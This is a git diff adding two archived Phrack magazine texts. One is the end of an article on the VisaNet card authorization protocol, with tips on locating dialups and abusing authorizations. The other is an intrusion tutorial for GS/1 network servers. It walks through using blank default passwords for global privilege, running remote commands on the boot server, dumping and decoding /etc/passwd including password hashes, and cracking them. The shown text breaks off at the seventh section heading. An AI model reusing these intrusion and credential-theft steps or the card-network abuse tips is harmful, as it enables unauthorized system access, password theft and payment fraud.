+1) The value of each bit in the LRC character, excluding the parity bit, is
+   defined such that the total count of ONE bits encoded in the corresponding
+   bit location of all characters of the data shall be even (this is also known
+   as an EXCLUSIVE OR (XOR) operation)
+
+      For card swipes, include the start sentinel, all the data read and
+      the end sentinel.
+
+      For VisaNet protocol messages, begin with the first character past
+      the STX, up to and including the ETX.
+
+2) The LRC characters parity bit is not a parity bit for the individual parity
+   bits of the data message, but it only the parity bit for the LRC character
+   itself.  Calculated as an even parity bit.
+
+[ i list a routine for calculating an LRC o a string later on in the document ]
+
+7.07 TEST DATA FOR RECORD FORMAT "J"
+
+The following two sections provide sample data for testing record format "J"
+with the VisaNet dial system.
+
+7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
+
+Table 7.07a provides a set of test data for record format "J" authorization
+request.
+
+                                  TABLE 7.07a
+                        Test Data For Record Format "J"
+
+ Test Data      Byte #   Length   Format   Field Name
+--------------------------------------------------------------------------------
+     J            1         1       A/N    Record Format
+ 0, 2, or 4       2         1       A/N    Application Type
+     .            3         1       A/N    Message Delimiter
+   401205        4-9        6       A/N    Acquirer BIN
+123456789012    10-21       12      NUM    Merchant Number
+    0001     *  22-25       4       NUM    Store Number
+    0001     *  26-29       4       NUM    Terminal Number
+    5999        30-33       4       NUM    Merchant Category Code
+    840         34-36       3       NUM    Merchant Country Code
+   94546        37-41       5       A/N    Merchant City Code
+    108         42-44       3       NUM    Time Zone Differential
+    54          45-46       2       A/N    Authorization Transaction Code
+  12345678      47-54       8       NUM    Terminal Identification Number
+     Y           55         1       A/N    Payment Service Indicator
+    0001     *  56-59       4       NUM    Transaction Sequence Number
+     @           60         1       A/N    Cardholder Identification Code
+D, H, T, or X    61         1       A/N    Account Data Source
+ Track or                                  Customer Data Field
+Manual Data
+    "FS"        N.A.        1       "FS"   Field Separator
+  0000123       N.A.      0 to 43   A/N    Transaction Amount
+    "FS"        N.A.        1       "FS"   Field Separator
+     ER         N.A.      0 or 2    A/N    Device Code/Industry code
+    "FS"        N.A.        1       "FS"   Field Separator
+                N.A.      0 or 6    NUM    Issuing/Receiving Institution ID
+    "FS"        N.A.        1       "FS"   Field Separator
+    000         N.A.      3 to 12   NUM    Secondary Amount (Cashback)
+    "FS"        N.A.        1       "FS"   Field Separator
+--------------------------------------------------------------------------------
+
+NOTE:* Denotes fields that are returned in the response message
+
+7.07.2 RESPONSE MESSAGE FOR TEST DATA
+
+Table 7.07b provides the response message for the test data provided in section
+7.07.1.
+
+                                  TABLE 7.07b
+               Response Message For Test Data - Record Format "J"
+
+ Test Data      Byte #   Length   Format   Field Name
+--------------------------------------------------------------------------------
+A, Y, N, or   *   1        1       A/N     Payment Service Indicator
+ "space"
+   0001       *  2-5       4       NUM     Store Number
+   0001       *  6-9       4       NUM     Terminal Number
+    5         *   1        1       A/N     Authorization Source Code
+   0001       * 11-14      4       NUM     Transaction Sequence Number
+    00        * 15-16      2       A/N     Response Code
+  12AB45      * 17-22      6       A/N     Approval Code
+  111992      * 23-28      6       NUM     Transaction Date (MMDDYY)
+AP ______       29-44      16      A/N     Authorization Response Message
+0, Sp, or "FS"   45        1       A/N     AVS Result Code
+              *Variable  0 or 15   NUM     Transaction Identifier
+    "FS"                           "FS"    Field Separator
+              *Variable  0 or 4    A/N     Validation Code
+    "FS"                           "FS"    Field Separator
+--------------------------------------------------------------------------------
+NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC)
+--------------------------------------------------------------------------------
+
+                                [ section two ]
+                              [ finding visanet ]
+
+finding visanet isn't hard, but it can be tedious.  visanet rents time off of
+compuserve and X.25 networks.  the compuserve nodes used are not the same
+as their information service, cis.  to identify a visanet dialup after
+connecting, watch for three enq characters and a three second span to hangup.
+if you've scanned out a moderate portion of your area code, you probably have a
+few dialups.  one idea is to write a short program to dial all the connects you
+have marked as garbage or worthless [ you did keep em, right? ]  and wait
+for the proper sequence.  X.25 connections should work similarly, but i don't
+know for sure.  read the section on visanet usage for other dialup sources.
+
+                                [ section three ]
+                        [ visanet link level protocol ]
+
+messages to/from visanet have a standard format:
+
+    stx - message - etx - lrc
+
+the message portion is the record formats covered in section one.  lrc values
+are calculated starting with the first byte of message, going up to and
+including the etx character.  heres an algorithm that calculates the lrc for a
+string. note: in order to work with the visanet protocols, append etx to the
+string before calling this function.
+
+unsigned char func_makelrc(char *buff)
+{
+   int i;
+   char ch, *p;
+
+   ch = 0;
+   p = buff;
+
+   for(;;)  {
+      ch = (ch^(*p));
+      p++;
+      if(!(*p))
+         break;
+   }
+
+   return ch;
+}
+
+for a single authorization exchange, the easiest kind of transaction, the
+sequence goes like this:
+
+host   enq                   stx-response-etx-lrc   eot
+term      stx-request-etx-lrc                    ack
+                                                          <disconnect>
+
+matching this sequence with test record formats from section one, 7.07, heres
+an ascii representation of a transaction.  control characters denoted in <>'s.
+[of course, you wouldn't really have a carriage return in middle of a message.
+duh. ]  this transaction would be for card number 4444111122223333 with an
+expiration date of 04/96.  the purchase amount is $1.23.  visanet responds with
+an approval code of 12ab45.
+
+host: <enq>
+
+term: <stx>J0.401205123456789012000100015999840945461085412345678Y0001@H444411
+      1122223333<fs>0496<fs>0000123<fs>ER<fs><fs>000<fs><etx><lrc>
+
+host: <stx>Y00010001500010012AB45111992APPROVAL 12AB45123456789012345<fs>
+      ABCD<fs><etx><lrc>
+
+term: <ack>
+
+host: <eot>
+
+authorizing multiple transactions during one connect session is only slightly
+more complicated.  the etx character on all messages sent to visanet are changed
+to etb and the application type is changed from '0' to '2' [section one 4.02].
+instead of responding after a transaction with eot, visanet instead polls the
+terminal again with enq.  this continues until the terminal either changes back
+to the single transaction format or issues an eot to the host.
+
+heres a short list of all control characters used:
+
+stx: start-of-text, first message framing character signaling message start
+etx: end-of-text, the frame ending character the last message of a sequence
+eot: end-of-transmission, used to end an exchange and signal disconnect
+enq: enquiry, an invitation to transmit a message or retransmit last item
+ack: affirmative acknowledgment, follows correct reception of message
+nak: negative acknowledgment, used to indicate that the message was not
+     understood or was received with errors
+syn: delay character, wait thirty seconds
+etb: end-of-block, the end framing character used to signal the end of a message
+     within a multiple message sequence
+
+other quick notes: visanet sometimes sends ack before stx on responses
+                   lrc characters can hold any value, such as stx, nak, etc
+                   visanet can say goodbye at any time by sending eot
+                   people can get very anal about error flow diagrams
+
+                                [ section four ]
+                    [ half the story; central data capture ]
+
+a full transaction requires two steps, one of which is described in this
+document: getting the initial authorization.  an authorization does basically
+nothing to a person's account.  oh, you could shut somebody's account down for
+a day or two by requesting a twenty thousand dollar authorization, but no other
+ill effects would result.  central data capture, the second and final step in a
+transaction, needs information from both the authorization request and
+response, which is used to generate additional data records.  these records are
+then sent to visanet by the merchant in a group, usually at the end of each day.
+
+                                [ section five ]
+                            [ common applications ]
+
+access to visanet can be implemented in a number of ways: directly on a pos
+terminal, indirectly via a lan, in a hardware specific device, or any
+permutation possible to perform the necessary procedures.  card swipers commonly
+seen at malls are low tech, leased at around fifty dollars per month, per
+terminal.  they have limited capacity, but are useful in that all of the
+information necessary for transactions is self contained.  dr delam and maldoror
+found this out, and were delighted to play the role of visanet in fooling the
+little device.  close scrutiny of section one reveals atm formats, phone order
+procedures, and new services such as direct debit from checking/savings and
+checks by phone.  start noticing the stickers for telecheck and visa atm cards,
+and you're starting to get the picture.
+
+                               [ section seven ]
+                              [ brave new world ]
+
+could it be?  yes, expiration dates really don't matter....
+this article written to thank previous Phrack writers...
+please thank me appropriately...
+800#s exist...
+other services exist... mastercard runs one...
+never underestimate the power of asking nicely...
+numerous other formats are available... see section one, 3.0 for hints...
+never whistle while you're pissing...
diff --git a/phrack46/17.txt b/phrack46/17.txt
new file mode 100644
index 0000000..05a3fff
--- /dev/null
+++ b/phrack46/17.txt
@@ -0,0 +1,603 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 17 of 28
+
+****************************************************************************
+
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+[<>                                                                     <>]
+[<>   ----+++===:::  GETTiN' D0wN 'N D1RTy wiT Da GS/1  :::===+++----   <>]
+[<>                                                                     <>]
+[<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
+[<>                                                                     <>]
+[<>                        Brought to you by:                           <>]
+[<>        [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT          <>]
+[<>                                                                     <>]
+[<>        Story line: Maldoror -n- [)r. [)elam                         <>]
+[<>        Main Characters: Menacing Maldoror & The Evil [)r. [)elam    <>]
+[<>        Unix Technical Expertise: Wunder-Boy [)elam                  <>]
+[<>        Sysco Technishun: Marvelous Maldoror                         <>]
+[<>                                                                     <>]
+[<>        Look for other fine [)elamo Labz and ChURcH oF ThE           <>]
+[<>        Non-CoNForMisT products already on the market such as        <>]
+[<>        DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's      <>]
+[<>        Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet       <>]
+[<>        skanner for Telix), PREFIX (Maldoror's telephone prefix      <>]
+[<>        identification program), and various other programs and      <>]
+[<>        philez written by Dr. Delam, Maldoror, Green Paradox,        <>]
+[<>        El Penga, Hellpop, and other certified DLI and CNC members.  <>]
+[<>                                                                     <>]
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+
+                               Index
+              ========================================
+
+              1. Finding and identifying a GS/1
+              2. Getting help
+              3. Gaining top privilege access
+              4. Finding the boot server
+              5. Connecting to the boot server
+              6. Getting the boot server password file
+              7. Other avenues
+
+
+----------------------------------------------------------------------------
+
+
+Here's hacking a GS/1 made EZ (for the sophisticated hacker)  It is
+advisable to fill your stein with Sysco and pay close attention... if
+Sysco is not available in your area, Hacker Pschorr beer will work
+almost as good... (especially Oktoberfest variety)
+
+
+What is a GS/1?
+---------------
+A GS/1 allows a user to connect to various other computers... in other
+words, it's a server, like a DEC or Xyplex.
+
+
+So why hack it?
+---------------
+Cuz itz there... and plus you kan access all sortz of net stuph fer
+phree. (QSD @ 208057040540 is lame and if you connect to it, you're
+wasting the GS/1.. the French fone police will fly over to your country
+and hunt you down like a wild pack of dogs, then hang you by your own
+twisted pair.)
+
+
+What to do:
+-----------
+
+
+
+               +--------------------------------------+
+               +  #1. Finding and identifying a GS/1  +
+               +--------------------------------------+
+
+Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
+GS/1, though the prompt can be set to whatever you want it to be.  A
+few years ago there were quite a number of GS/1's laying around on
+Tymnet and Telenet... you can still find a few if you scan the right
+DNIC's.  (If you don't know what the hell I'm talking about, look at
+some old Phracks and LOD tech. journals.)
+
+The prompt will look similar to this:
+
+(!2) GS/1>
+
+(The (!2) refers to the port you are on)
+
+
+
+                        +--------------------+
+                        +  #2. Getting help  +
+                        +--------------------+
+
+First try typing a '?' to display help items.
+
+A help listing looks like this:
+
+> (!2) GS/1>?
+>       Connect     <address>[,<address>] [ ECM ] [ Q ]
+>       DO          <macro-name>
+>       Echo        <string>
+>       Listen
+>       Pause       [<seconds>]
+>       PIng        <address> [ timeout ]
+>       SET         <param-name> = <value> ...
+>       SHow        <argument> ...
+
+At higher privileges such as global (mentioned next) the help will
+look like this (note the difference in the GS/1 prompt with a # sign):
+
+> (!2) GS/1# ?
+>       BRoadcast   ( <address> ) <string>
+>       Connect     ( <address> ) <address>[,<address>] [ ECM ] [ Q ]
+>       DEFine      <macro-name> = ( <text> )
+>       DisConnect  ( <address> ) [<session number>]
+>       DO          ( <address> ) <macro-name>
+>       Echo        <string>
+>       Listen      ( <address> )
+>       Pause       [<seconds>]
+>       PIng        <address> [ timeout ]
+>       ReaD        ( <address> ) <option> <parameter>
+>       REMOTE      <address>
+>       ROtary      ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ...
+>       SAve        ( <address> ) <option> <filename>
+>       SET         ( <address> ) <param-name> = <value> ...
+>       SETDefault  ( <address> ) [<param-name> = <value>] ...
+>       SHow        ( <address> ) <argument> ...
+>       UNDefine    ( <address> ) <macro-name>
+>       UNSave      ( <address> ) <filename>
+>       ZeroMacros  ( <address> )
+>       ZeroStats   ( <address> )
+
+Additional commands under global privilege are: BRoadcast, DEFine,
+DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
+ZeroStats, and a few extra options under the normal user commands.
+
+If you need in-depth help for any of the commands, you can again use the
+'?' in the following fashion:
+
+> (!2) GS/1>sho ?
+>       SHow    ADDRess
+>       SHow    ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ]
+>       SHow    DefaultParameters [<param-name> ...]
+>       SHow    GLobalPARameters
+>       SHow    NetMAP [ Short | Long ]
+>       SHow    PARAmeterS [<param-name> ...]
+>       SHow    <param-name> ...
+>       SHow    SESsions [ P ]
+>       SHow    VERSion
+
+> (!2) GS/1>sh add?
+>       SHow    ADDRess
+
+> (!2) GS/1>sh add
+> ADDRess = &000023B5%07000201E1D7!2
+
+"sh add" displays your own network, address and port number.
+
+The network is 000023B5
+The address is 07000201E1D7
+The port number is 2
+
+
+
+                   +------------------------------------+
+                   +  #3. Gaining top privilege access  +
+                   +------------------------------------+
+
+Figure out the global password.
+
+Do a "set priv=global" command.
+
+   Note:
+   ----
+   There are 3 states to set priv to: user, local, and global.  Global is
+   the state with the most privilege.  When you attain global privilege,
+   your prompt will change to have a '#' sign at the end of it.. this means
+   you have top priceless (similar to *nix's super user prompt).
+
+The GS/1 will prompt you for a password.  The default password on GS/1's
+is to have no password at all... The GS/1  will still prompt you for a
+password, but you can enter anything at this point if the password was
+never set.
+
+
+
+                  +-------------------------------+
+                  +  #4. Finding the boot server  +
+                  +-------------------------------+
+
+Figure out the boot server address available from this GS/1 ..
+
+The boot server is what lies under the GS/1.  We've found that GS/1's are
+actually run on a Xenix operating system.. (which is of course a nice
+phamiliar territory)  It's debatable whether all GS/1's are run on Xenix or
+not as we have yet to contact the company.  (We may put out a 2nd file going
+into more detail.)
+
+Do a "sh b" or "sh global" as shown in the following examples:
+
+> (!2) GS/1# sh b
+> BAud = 9600         BootServerAddress = &00000000%070002017781
+> BReakAction = ( FlushVC, InBand )       BReakChar = Disabled
+> BSDelay = None      BUffersize = 82
+
+> (!2) GS/1# sh global
+> ...............................Global Parameters............................
+> DATE = Wed Jun 22 21:16:45 1994         TimeZone = 480 minutes
+> DaylightSavingsTime = 0 minutes         LogoffStr = "L8r laM3r"
+> WelcomeString = "Welcome to your haqued server (!2), Connected to "
+> DOmain = "thelabz"                      Organization = "delam0"
+> PROmpt = "GS/1>"                        NMPrompt = "GS/1# "
+> LocalPassWord = ""                      GlobalPassWord = "haque-me"
+> NetMapBroadcast = ON                    MacType = EtherNET
+> CONNectAudit = ON                       ERRorAudit = ON
+> AUditServerAddress = &000031A4%07000200A3D4
+> AUditTrailType = Local
+> BootServerAddress = &00000000%070002017781
+
+Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
+... these are the actual passwords that need to be entered (or in the case
+of the LocalPassWord, "" matches any string).  You'll only be able to
+"sh global" after a successful "set priv=global".
+
+Now that you have the boot server address, the next step is enabling
+communication to the boot server.
+
+
+
+              +-------------------------------------+
+              +  #5. Connecting to the boot server  +
+              +-------------------------------------+
+
+Do a REMOTE <address> where address is the address of the machine you
+want to issue remote commands to.
+
+> (!2) GS/1# REMOTE %070002017781
+> (!2) Remote: ?
+>       BInd        <address> [-f <bootfile>] [-l <loader>] [<nports>]
+>       BRoadcast   ( <address> ) "<string>"
+>       CoPyfile    [<address>:]<pathname> [<address>:][<pathname>]
+>       LiSt        [ -ls1CR ] [<pathname> ...]
+>       MoVe        <pathname> <pathname>
+>       NAme        <clearinghouse name> = <address>[,<address>]...
+>       Ping        <address> [timeout]
+>       ReMove      <pathname> ...
+>       SET         [( <address> )] <param-name> = <value> ...
+>       SETDefault  <param-name> = <value> ...
+>       SHow        <argument>
+>       UNBind      <address>
+>       UNDefine    <macro name>
+>       UNName      <name>
+>       ZeroStats
+>       <BREAK>     (to leave remote mode)
+
+Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
+you will be issuing commands to whatever remote machine you specified
+by the REMOTE <address> command.
+
+Notice for this case, the boot server's address was used.
+
+When you get the REMOTE: prompt, you can issue commands that will be
+executed on the remote machine.  Try doing a '?' to see if it's another
+GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.
+
+Also notice that the help commands on the remote are not the same as
+those for the GS/1 (though, if you establish a remote link with another
+GS/1 they will be the same).
+
+> (!2) Remote: ls -l
+> total 1174
+> drwxrwxrwx   2 ncs      ncs          160 Aug 17  1989 AC
+> drwxrwxrwx   2 ncs      ncs         5920 Jun  5 00:00 AUDIT_TRAIL
+> drwxrwxrwx   2 ncs      ncs           96 Jun  5 01:00 BACKUP
+> drwxrwxrwx   2 ncs      ncs          240 Jun  4 04:42 BIN
+> drwxrwxrwx   2 ncs      ncs          192 Jun  4 04:13 CONFIGS
+> drwxrwxrwx   2 ncs      ncs           64 Aug 17  1989 DUMP
+> drwxrwxrwx   2 ncs      ncs           80 Aug 17  1989 ETC
+> drwxrwxrwx   2 ncs      ncs          160 Jun  4 04:13 GLOBALS
+> -rw-r--r--   1 ncs      ncs          228 Jun  5 00:59 btdata
+> -rw-r--r--   1 ncs      ncs         8192 Jun  8  1993 chnames.dir
+> -rw-r--r--   1 ncs      ncs        11264 Jun  1 13:41 chnames.pag
+> drwxrwxrwx   2 ncs      ncs           48 Jun  5 00:00 dev
+> drwx------   2 bin      bin         1024 Aug 17  1989 lost+found
+> -rw-rw-rw-   1 ncs      ncs       557056 Mar 23  1992 macros
+> -rw-r--r--   1 ncs      ncs          512 Oct 22  1993 passwd
+
+Look familiar??  If not, go to the nearest convenient store and buy the
+a 12 pack of the cheapest beer you can find.. leave your computer
+connected so you hurry back, and slam eight or nine cold onez... then
+look at the screen again.
+
+You're basically doing a Remote Procedure Call for ls to your Xenix boot
+server.
+
+Notice at this point that the "passwd" is not owned by root.  This is
+because this is not the system password file, and you are not in the
+"/etc" directory... (yet)
+
+There are a couple of problems:
+
+> (!2) Remote: cat
+> Invalid REMOTE command
+>
+> (!2) Remote: cd /etc
+> Invalid REMOTE command
+
+You cannot view files and you cannot change directories.
+
+To solve the "cd" problem do the following:
+
+> (!2) Remote: ls -l ..
+> total 26
+> drwxrwxrwx  12 root     root         352 Jun  5 00:59 NCS
+> drwxr-xr-x   2 bin      bin          112 Aug 17  1989 adm
+> drwxrwx---   2 sysinfo  sysinfo       48 Aug 17  1989 backup
+> drwxr-xr-x   2 bin      bin         1552 Aug 17  1989 bin
+> drwxr-xr-x  20 bin      bin          720 Aug 17  1989 lib
+> drwxrwxrwx   6 ncs      ncs          224 Aug 17  1989 ncs
+> drwxr-xr-x   2 bin      bin           32 Aug 17  1989 preserve
+> drwxr-xr-x   2 bin      bin           64 Aug 17  1989 pub
+> drwxr-xr-x   7 bin      bin          144 Aug 17  1989 spool
+> drwxr-xr-x   9 bin      bin          144 Aug 17  1989 sys
+> drwxr-x---   2 root     root          48 Aug 17  1989 sysadm
+> drwxrwxrwx   2 bin      bin           48 Jun  5 01:00 tmp
+>
+> (!2) Remote: ls -l ../..
+> total 1402
+> -rw-r--r--   1 root     root        1605 Aug 17  1989 .login
+> -r--r--r--   1 ncs      ncs         1605 Aug 28  1990 .login.ncs
+> -rw-r--r--   1 root     root         653 Aug 17  1989 .logout
+> -r--r--r--   1 ncs      ncs          653 Aug 28  1990 .logout.ncs
+> -rw-------   1 root     root         427 Aug 17  1989 .profile
+> drwxr-xr-x   2 bin      bin         2048 Aug 17  1989 bin
+> -r--------   1 bin      bin        25526 May  4  1989 boot
+> drwxr-xr-x   6 bin      bin         3776 Aug 17  1989 dev
+> -r--------   1 bin      bin          577 Nov  3  1987 dos
+> drwxr-xr-x   5 bin      bin         1904 Jun  2 12:40 etc
+> drwxr-xr-x   2 bin      bin           64 Aug 17  1989 lib
+> drwx------   2 bin      bin         1024 Aug 17  1989 lost+found
+> drwxr-xr-x   2 bin      bin           32 Aug 17  1989 mnt
+> drwxrwxrwx   2 bin      bin          512 Jun  5 01:20 tmp
+> drwxr-xr-x  14 bin      bin          224 Aug 17  1989 usr
+> -rw-r--r--   1 bin      bin       373107 Aug 17  1989 xenix
+> -rw-r--r--   1 root     root      287702 Aug 17  1989 xenix.old
+
+Your brain should now experience deja vous.. you just found the
+root directory.  (for the non-*nix, lam0-hacker, the root directory
+has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)
+
+Now you can get to /etc/passwd as follows:
+
+> (!2) Remote: ls -l ../../etc
+> total 1954
+> -rwx--x--x   1 bin      bin         7110 May  8  1989 accton
+> -rwx------   1 bin      bin         1943 May  8  1989 asktime
+> -rwx------   1 bin      bin        31756 May  8  1989 badtrk
+> -rw-rw-rw-   1 root     root        1200 Apr 24 12:40 bootlog
+> -rwx--x--x   1 bin      bin        24726 May  8  1989 brand
+> -rw-r--r--   1 bin      bin           17 Aug 17  1989 checklist
+> -rw-r--r--   2 bin      bin           17 Aug 17  1989 checklist.last
+> -rw-r--r--   1 ncs      ncs           17 Aug 28  1990 checklist.ncs
+> -rw-r--r--   2 bin      bin           17 Aug 17  1989 checklist.orig
+> -rwx------   1 bin      bin         2857 May  8  1989 chsh
+> -rwx------   1 bin      bin         7550 May  8  1989 clri
+> -rwx------   1 bin      bin         8034 May  8  1989 cmos
+> -rwxr-xr-x   1 root     bin        31090 Aug 28  1990 cron
+> -rw-r--r--   1 bin      bin          369 May  8  1989 cshrc
+> ...... etc.
+> -rw-r--r--   1 root     root         465 Mar  5  1991 passwd
+
+Yeah, now what?!
+
+You've found the /etc/passwd file, but you don't have "cat" to type the
+file out.  Now you're stuck... so drink a half a bottle of Sysco per
+person. (We did... and as you'll see, Sysco is the drink of a manly hackers
+like us... make sure it's the big bottle kind not those girly small
+onez.)
+
+
+
+            +---------------------------------------------+
+            +  #6. Getting the boot server password file  +
+            +---------------------------------------------+
+
+There is one way to get around the cat problem (no itz n0t puttin
+catnip laced with somethin U made frum a phile on yer doorstep)
+It's done using ls.  On this Xenix system, the directory structure is
+the old Unix format: A 16 byte record comprised of a 2 byte I-number
+and a 14 byte character field.
+
+   Note about directory structure for the inquisitive hacker:
+   In a directory record there is a 14 byte string containing the file
+   name, and the 2 byte I-number (2 bytes = an integer in this case)
+   which is a number that is an (I)ndex pointer to the I-node.  The
+   I-node then contains the information about where the file's data is
+   actually kept (similar to how a FAT table works on an IBM PC yet a
+   different concept as it has indirect index blocks etc. I won't get
+   into) and what permissions are set for the file.  Be warned that in
+   newer *nix implementations, file names can be more than 14 characters
+   and the directory structure will be a bit different than discussed.
+
+The "ls" command has an option that allows you to tell it "this *file* is
+a *directory*.. so show me what's in the directory"... newer *nix
+systems won't like this (the -f option) because of the new directory
+structure.
+
+> (!2) Remote: ls -?
+> ls: illegal option --?
+> usage:  -1ACFRabcdfgilmnopqrstux [files]
+>
+> (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
+> 28530 ot:BJlx/e8APHe   30580 :0:0:Super use   14962 /:/bin/csh?sys
+> 25697 m:X/haSqFDwHz1   14929 0:0:System Adm   28265 istration:/usr
+> 29487 ysadm:/bin/sh?   29283 on:NOLOGIN:1:1   17210 ron daemon for
+> 28704 eriodic tasks:   14895 ?bin:NOLOGIN:3   13114 :System file a
+> 28004 inistration:/:   29962 ucp::4:4:Uucp    25697 ministration:/
+> 29557 r/spool/uucppu   27746 ic:/usr/lib/uu   28771 /uucico?asg:NO
+> 20300 GIN:6:6:Assign   25185 le device admi   26990 stration:/:?sy
+> 26995 nfo:NOLOGIN:10   12602 0:Access to sy   29811 em information
+> 12090 :?network:NOLO   18759 N:12:12:Mail a   25710  Network admin
+> 29545 tration:/usr/s   28528 ol/micnet:?lp:   20302 LOGIN:14:3:Pri
+> 29806  spooler admin   29545 tration:/usr/s   28528 ol/lp:?dos:NOL
+> 18255 IN:16:10:Acces    8307 to Dos devices   12090 :?ncs:yYNFnHnL
+> 22327 xcU:100:100:NC    8275 operator:/usr/
+>
+> (!2) Remote: <BRK>
+> (!2) GS/1#
+
+Wow, kewl.  Now that you have a bunch-o-shit on your screen, you have
+to make some sense out of it.
+
+The password file is almost legible, but the I-numbers still need to be
+converted to ASCII characters.  This can be accomplished in a variety of
+ways... the easiest is to write a program like the following in C:
+
+On a PC the following code should work:
+
+#include <stdio.h>
+main()
+{
+   union {
+      int i;
+      char c[2];
+   } x;
+   while (1) {
+      printf("Enter I-Number: ");
+      scanf("%d", &x.i);
+      printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
+   }
+}
+
+On a *nix based system the following code will work (depending on
+word size and byte arrangement):
+
+#include <stdio.h>
+main()
+{
+   union {
+      short int i;
+      char c[2];
+   } x;
+   while (1) {
+      printf("Enter I-Number: ");
+      scanf("%hd", &x.i);
+      printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
+   }
+}
+
+
+When you have translated the I-numbers you can substitute the ASCII
+values by hand (or write a d0p3 program to do it for you):
+
+28530 ot:BJlx/e8APHe   30580 :0:0:Super use   14962 /:/bin/csh?sys
+28530 = [r][o]         30580 = [t][w]         14962 = [r][:]
+root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
+
+25697 m:X/haSqFDwHz1   14929 0:0:System Adm   28265 istration:/usr
+25697 = [a][d]         14929 = [Q][:]         28265 = [i][n]
+adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
+
+29487 ysadm:/bin/sh?   29283 on:NOLOGIN:1:1   17210 ron daemon for
+29487 = [/][s]         29283 = [c][r]         17210 = [:][C]
+/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
+
+28704 eriodic tasks:   14895 ?bin:NOLOGIN:3   13114 :System file a
+28704 = [ ][p]         14895 = [/][:]         13114 = [:][3]
+ periodic tasks:/:?bin:NOLOGIN:3:3:System file a
+
+28004 inistration:/:   29962 ucp::4:4:Uucp    25697 ministration:/
+28004 = [d][m]         29962 = [^M][u]        25697 = [a][d]
+dministration:/:
+uucp::4:4:Uucp administration:/
+
+29557 r/spool/uucppu   27746 ic:/usr/lib/uu   28771 /uucico?asg:NO
+29557 = [u][s]         27746 = [b][l]         28771 = [c][p]
+usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
+
+20300 GIN:6:6:Assign   25185 le device admi   26990 stration:/:?sy
+20300 = [L][O]         25185 = [a][b]         26990 = [n][i]
+LOGIN:6:6:Assignable device administration:/:?sy
+
+26995 nfo:NOLOGIN:10   12602 0:Access to sy   29811 em information
+26995 = [s][i]         12602 = [:][1]         29811 = [s][t]
+sinfo:NOLOGIN:10:10:Access to system information
+
+12090 :?network:NOLO   18759 N:12:12:Mail a   25710  Network admin
+12090 = [:][/]         18759 = [G][I]         25710 = [n][d]
+:/:?network:NOLOGIN:12:12:Mail and Network admin
+
+29545 tration:/usr/s   28528 ol/micnet:?lp:   20302 LOGIN:14:3:Pri
+29545 = [i][s]         28528 = [p][o]         20302 = [N][O]
+istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
+
+29806  spooler admin   29545 tration:/usr/s   28528 ol/lp:?dos:NOL
+29806 = [n][t]         29545 = [i][s]         28528 = [p][o]
+nt spooler administration:/usr/spool/lp:?dos:NOL
+
+18255 IN:16:10:Acces    8307 to Dos devices   12090 :?ncs:yYNFmHnL
+18255 = [O][G]          8307 = [s][ ]         12090 = [:][/]
+OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL
+
+22327 xcU:100:100:NC    8275 operator:/usr/
+22327 = [7][W]          8275 = [S][ ]
+7WxcU:100:100:NCS operator:/usr
+
+
+The resulting file will look like the following:
+
+root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
+adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
+/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
+ periodic tasks:/:?bin:NOLOGIN:3:3:System file a
+dministration:/:
+uucp::4:4:Uucp administration:/
+usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
+LOGIN:6:6:Assignable device administration:/:?sy
+sinfo:NOLOGIN:10:10:Access to system information
+:/:?network:NOLOGIN:12:12:Mail and Network admin
+istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
+nt spooler administration:/usr/spool/lp:?dos:NOL
+OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
+7WxcU:100:100:NCS operator:/usr
+
+Because the ls command cannot display "non-printable" characters such
+as the carriage return, it will replace them with a '?' character...
+delete the '?' characters and divide by line at these locations.  When
+you finish doing that, you'll have a standard /etc/passwd file:
+
+root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
+sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
+cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
+bin:NOLOGIN:3:3:System file administration:/:
+uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
+asg:NOLOGIN:6:6:Assignable device administration:/:
+sysinfo:NOLOGIN:10:10:Access to system information:/:
+network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
+lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
+dos:NOLOGIN:16:10:Access to Dos devices:/:
+ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr
+
+Once you've assembled your password file in a standard ASCII form,
+you'll of course want to crack it with one of the many available DES
+cracking programs.
+
++---------------------+
++  #7: Other Avenues  +
